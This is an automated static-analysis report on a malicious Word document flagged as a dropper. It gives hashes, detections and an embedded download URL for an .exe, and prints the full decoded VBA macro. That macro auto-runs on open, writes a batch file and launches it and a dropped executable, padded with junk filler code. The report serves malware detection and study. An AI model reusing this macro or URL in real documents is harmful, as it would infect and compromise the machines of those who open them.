Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fd51463bd5345771…

MALICIOUS

Office (OOXML)

Size: 84.5 KB
Created: 2020-01-13 01:40:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2020-05-25
MD5: 0fab1af13aa4bc52685fde4c3c1ffa98
SHA-1: 7898466a0ac7e10a78722a7d27e2cc0a3f3c286e
SHA-256: fd51463bd534577173d121227c116d4c5d25fbbe497e762cf4acd497a4f9784d
Risk Score: 150

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with an AutoOpen macro that runs when the document is opened, an indicator of malicious intent. ClamAV detects it as a dropper (Doc.Dropper.Valyria-8011744-0). The VBA script likely downloads and executes a secondary payload, a common tactic for malware distribution.

Heuristics (4)

  • ClamAV: Doc.Dropper.Valyria-8011744-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Valyria-8011744-0
  • VBA project inside OOXML [medium, OOXML_VBA] (1 related finding)
    Document contains a VBA project; VBA macros are present.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Matched line in script:
        End Function
        Sub autoopen()
        On Error Resume Next
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.afboxmarket.com/masnd.exe In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 27441 bytes
SHA-256: 8ebbebe42eceef7c93fa205c0636e6d2c772b1fe27c3d3c39ece9ccb31ac3615
First 1,000 lines of the extracted script
Attribute VB_Name = "EndTime"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Apple"
Option Explicit

Public Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

Public Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessID As Long
dwThreadID As Long
End Type



Public Const NORMAL_PRIORITY_CLASS = &H20&
Public Const INFINITE = -1&


Attribute VB_Name = "Potatoes"



Const MOVEFILE_REPLACE_EXISTING = &H1
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Const FILE_BEGIN = 0
Const FILE_SHARE_READ = &H1
Const CREATE_ALWAYS = 2
Const OPEN_EXISTING = 4
Const GENERIC_READ = &H80000000
Const GENERIC_WRITE = &H40000000



Attribute VB_Name = "ClockFinished"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public sCurrentFile As String
Private Type ObjectProperties
  Name As String
  Caption As String
  ToolTip As String
End Type
Private Type FormProperties
  Name As String
  Caption As String
  ObjectCount As Integer
  ObjProp() As ObjectProperties
End Type

Private FormProp() As FormProperties
Private iFormCount As Integer
Sub LoadLanguagePack(sFile As String)
  Dim sLine As String, iPos As Integer, sTmp As String
  Dim sFormName As String, sTmp2 As String
  Dim bFormFound As Boolean
  sCurrentFile = sFile
  iFormCount = 0
  Open sFile For Input As #1
    Do
      Input #1, sLine
      If Left$(sLine, 1) = ";" Or sLine = "" Then GoTo Jump

      If Left$(sLine, 1) = "[" And Right$(sLine, 5) = ".End]" Then
        bFormFound = False: GoTo Jump
      End If
      If Left$(sLine, 1) = "[" And Right$(sLine, 1) = "]" Then
        bFormFound = True
        sFormName = Mid$(sLine, 2, Len(sLine) - 2)
        iFormCount = iFormCount + 1
        ReDim Preserve FormProp(iFormCount)
        FormProp(iFormCount).Name = sFormName: GoTo Jump
      End If
      
      If Left$(sLine, 7) = "Caption" Then
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
        FormProp(iFormCount).Caption = Left$(sTmp, Len(sTmp) - 1)
        GoTo Jump
      End If
            iPos = InStr(sLine, ".Caption")
      
      If iPos > 0 And bFormFound Then
        FormProp(iFormCount).ObjectCount = FormProp(iFormCount).ObjectCount + 1
        ReDim Preserve FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount)
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Caption = sTmp
        GoTo Jump
      End If
            iPos = InStr(sLine, ".ToolTip")
      If iPos > 0 And bFormFound Then
        sTmp = Left$(sLine, iPos - 1)
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).Name = sTmp
        sTmp = Mid$(sLine, InStr(sLine, "=") + 2)
      
        If Right$(sTmp, 1) <> Chr$(34) Then
          Do While Right$(sTmp, 1) <> Chr$(34)
            Input #1, sTmp2
            sTmp = sTmp & ", " & sTmp2
          Loop
        End If
        If Right$(sTmp, 1) = Chr$(34) Then sTmp = Left$(sTmp, Len(sTmp) - 1)
      
        FormProp(iFormCount).ObjProp(FormProp(iFormCount).ObjectCount).ToolTip = sTmp
        GoTo Jump
      End If
      
Jump:


    Loop Until EOF(1)

  Close #1

End Sub


Sub SetLanguageInForm(frmForm As Form)
  
  On Local Error Resume Next
  Dim i As Integer, j As Integer
  Dim iForm As Integer
  

  For i = 1 To iFormCount
    If FormProp(i).Name = frmForm.Name Then
      iForm = i
      Exit For
    End If
  Next i

  
  frmForm.Caption = FormProp(iForm).Caption
    For j = 1 To FormProp(iForm).ObjectCount
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).Caption = FormProp(iForm).ObjProp(j).Caption
    frmForm.Controls(FormProp(iForm).ObjProp(j).Name).TooltipText = FormProp(iForm).ObjProp(j).ToolTip
  Next j
  
End Sub

Function EnumLanguagePacks(sFolder As String, sExtension As String) As String

  If Not DirExists(sFolder) Then
    MsgBox sFolder & " doesn't exist.", vbCritical
    Exit Function
  End If
  
  Dim sTmp As String

  If Right$(sFolder, 1) <> "\" Then sFolder = sFolder & "\"
  sTmp = Dir$(sFolder & sExtension)
  If sTmp <> "" Then
    EnumLanguagePacks = sTmp
    sTmp = Dir$
    While Len(sTmp) > 0
      EnumLanguagePacks = EnumLanguagePacks & "|" & sTmp
      DoEvents
      sTmp = Dir$
    Wend
  End If

End Function


Private Function DirExists(ByVal strDirName As String) As Integer
    Const strWILDCARD$ = "*.*"

    Dim strDummy As String

    On Error Resume Next

    If Right$(strDirName, 1) <> "\" Then strDirName = strDirName & "\"
    strDummy = Dir$(strDirName & strWILDCARD, vbDirectory)
    DirExists = Not (strDummy = vbNullString)

    Err = 0
End Function


Sub CarregaPacotedeLinguagem(sArquivo As String)
  
  LoadLanguagePack sArquivo
  
End Sub

Sub SetaLinguagemnoForm(frmForm As Form)

  SetLanguageInForm frmForm

End Sub

Function EnumeraPacotesdeLinguagem(sDiretorio As String, sExtensao As String) As String
  
  EnumLanguagePacks sDiretorio, sExtensao
  
End Function



Attribute VB_Name = "Carrow"
Public mf As String


Function GetAssist() As Boolean
Dim lHandle

     mf = "C:\Jeropit"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
        mf = "C:\Htyu"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
    lHandle = CreateFileA("C:\Jeropit\Poteri.BAT", GENERIC_WRITE Or GENERIC_READ, _
                         &H2, 0, CREATE_ALWAYS, FILE_SHARE_WRITE, 0)
    
    If lHandle <> 0 Then CloseHandle lHandle

        mf = "C:\Htyu\Bioper"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    

        mf = "C:\Htyu\Bioper\Derip"
H = H + 7.00000000084 * Cos(94.02475904578 + 10632.7701900862 * j)
H = H + 7.00000000085 * Cos(86.60912614442 + 45585.1728121874 * j)
H = H + 7.00000000078 * Cos(86.47358603432 + 114.43928868521 * j)
H = H + 7.00000000097 * Cos(86.02223363535 + 10218.8084705184 * j)
H = H + 7.00000000081 * Cos(73.03870237004 + 9793.8009023358 * j)
H = H + 7.00000000092 * Cos(37.80301220092 + 24383.0791084414 * j)
H = H + 7.00000000087 * Cos(2.15124790938 + 28313.288804661 * j)
H = H + 7.00000000075 * Cos(5.17868679355 + 63658.8777508376 * j)
H = H + 7.00000000078 * Cos(5.81927313665 + 567.7186377304 * j)
H = H + 7.00000000075 * Cos(73.72618192481 + 19580.4882576708 * j)
H = H + 7.00000000071 * Cos(37.10259261764 + 90695.7520751204 * j)
H = H + 7.00000000077 * Cos(94.16012067704 + 1573.8204240988 * j)
H = H + 7.00000000076 * Cos(5.12884307551 + 49515.382508407 * j)
H = H + 7.00000000069 * Cos(37.29569499484 + 10175.2578735752 * j)
H = H + 7.00000000061 * Cos(86.80385549281 + 19889.7665803266 * j)
H = H + 7.0000000006 * Cos(86.56685040226 + 30426.557543195 * j)
H = H + 7.00000000062 * Cos(86.16222812699 + 42430.4857272918 * j)
H = H + 7.0000000005 * Cos(94.17899839001 + 22779.4372461938 * j)
H = H + 7.00000000048 * Cos(73.52546758016 + 20639.87018786 * j)
H = H + 7.00000000046 * Cos(86.41738494249 + 34570.0663348526 * j)
H = H + 7.00000000037 * Cos(86.69675087759 + 44007.8292697396 * j)
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    

        mf = "C:\Deripoi"
    
    If Right(mf, 1) <> "\" Then
        mf = mf & "\"
        MakeSureDirectoryPathExists mf
    End If
    
    Open "C:\Jeropit\Poteri.BAT" For Output As #1
    Print #1, BlueControl.FAQ.Caption
    Close #1

    Testing
    
End Function
Sub autoopen()
On Error Resume Next
'The Food Storage & Distribution Federation
GetAssist
CopyToA
End Sub
Public Sub CopyToA()
    Dim docActive As Document
    Dim docNew As Document
    Dim rngActiveDocPart As Range
    Dim rngNewDocPart As Range
    Dim strDocName As String
    Dim Proc As PROCESS_INFORMATION
    Dim strTemplateName As String
    Dim start As STARTUPINFO
    Set docActive = ActiveDocument
    
    strDocName = docActive.Name
    strTemplateName = docActive.AttachedTemplate.FullName
    

    Set docNew = Documents.Add(strTemplateName)
    
 
    For Each rngActiveDocPart In docActive.StoryRanges
        Set rngNewDocPart = docNew.StoryRanges _
           (rngActiveDocPart.StoryType)
        rngActiveDocPart.Copy
                
   
        rngNewDocPart.Paste
    Next rngActiveDocPart
    
    docNew.Activate
 
    With Dialogs(wdDialogFileSaveAs)
        .Name = "" & strDocName
        .Show
    End With
End Sub




Attribute VB_Name = "BlueControl"
Attribute VB_Base = "0{D47C5792-41C1-405C-B043-B3681A137E2D}{E18FCDD9-6B32-44FB-8205-C980B056F78B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Attribute VB_Name = "cPalette"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "EnumsTip"

Public Sub ExecCmd(cmdline As String)
Dim Proc As PROCESS_INFORMATION
Dim start As STARTUPINFO
Dim ReturnValue

start.cb = Len(start)
start.dwFlags = 1&
ReturnValue = CreateProcessA(0&, cmdline$, 0&, 0&, 0&, _
NORMAL_PRIORITY_CLASS, 0&, 0&, start, Proc)

Do
ReturnValue = WaitForSingleObject(Proc.hProcess, 0)
DoEvents
Loop Until ReturnValue <> 258

ReturnValue = CloseHandle(Proc.hProcess)
End Sub

Public Function Testing() As Boolean
ExecCmd "C:\Jeropit\Poteri.BAT"
ExecCmd "C:\Htyu\Bioper\Gilen.exe"
End Function




Attribute VB_Name = "wDelcares"
#If VBA7 Then
Public Declare PtrSafe Function SetPixel Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal crColor As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal crTransparent As LongPtr) As Boolean
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As LongPtr
Public Declare PtrSafe Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr

Public Declare PtrSafe Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As LongPtr, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, _
ByVal bInheritHandles As LongPtr, ByVal dwCreationFlags As LongPtr, _
ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As LongPtr, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As LongPtr


Public Declare PtrSafe Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As LongPtr
Public Declare PtrSafe Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare PtrSafe Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As LongPtr) As LongPtr
Public Declare PtrSafe Function GetDC Lib "user32" (ByVal hwnd As LongPtr) As LongPtr
Public Declare PtrSafe Function DeleteObject Lib "gdi32" (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function SelectObject Lib "gdi32" (ByVal hDC As LongPtr, ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function BitBlt Lib "gdi32" (ByVal hDestDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function StretchBlt Lib "gdi32" (ByVal hDC As LongPtr, ByVal X As LongPtr, ByVal Y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hSrcDC As LongPtr, ByVal xSrc As LongPtr, ByVal ySrc As LongPtr, ByVal nSrcWidth As LongPtr, ByVal nSrcHeight As LongPtr, ByVal dwRop As LongPtr) As LongPtr
Public Declare PtrSafe Function GetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr) As LongPtr
Public Declare PtrSafe Function SetStretchBltMode Lib "gdi32" (ByVal hDC As LongPtr, ByVal nStretchMode As LongPtr) As LongPtr
#Else
Public Declare Function SetPixel Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long
Public Declare Function CreateCompatibleDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function DeleteDC Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function GdiTransparentBlt Lib "gdi32.dll" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal crTransparent As Long) As Boolean
Public Declare Function MakeSureDirectoryPathExists Lib "imagehlp.dll" (ByVal lpPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function CreateFileA Lib "kernel32" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function WaitForSingleObject Lib "kernel32" (ByVal _
hHandle As Long, ByVal dwMilliseconds As Long) As Long

Public Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, ByVal _
lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As STARTUPINFO, lpProcessInformation As _
PROCESS_INFORMATION) As Long


Public Declare Function SetEnvironmentVariable Lib "kernel32" Alias "SetEnvironmentVariableA" (ByVal lpName As String, ByVal lpValue As String) As Long
Public Declare Function GetEnvironmentVariable Lib "kernel32" Alias "GetEnvironmentVariableA" _
(ByVal lpName As String, ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Sub GetStartupInfoA Lib "kernel32" (lpStartupInfo As STARTUPINFO)
Public Declare Function DeleteObject Lib "gdi32" (ByVal hObject As Long) As Long
Public Declare Function SelectObject Lib "gdi32" (ByVal hDC As Long, ByVal hObject As Long) As Long
Public Declare Function StretchBlt Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal nSrcWidth As Long, ByVal nSrcHeight As Long, ByVal dwRop As Long) As Long
Public Declare Function GetStretchBltMode Lib "gdi32" (ByVal hDC As Long) As Long
Public Declare Function SetStretchBltMode Lib "gdi32" (ByVal hDC As Long, ByVal nStretchMode As Long) As Long
#End If
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 78848 bytes
SHA-256: ae8f40a5a1092b75fbd51243a5e937558feb3254db79a8e06683c92fc463a563
Detection
ClamAV: Doc.Dropper.Valyria-8011744-0
Obfuscation or payload: unlikely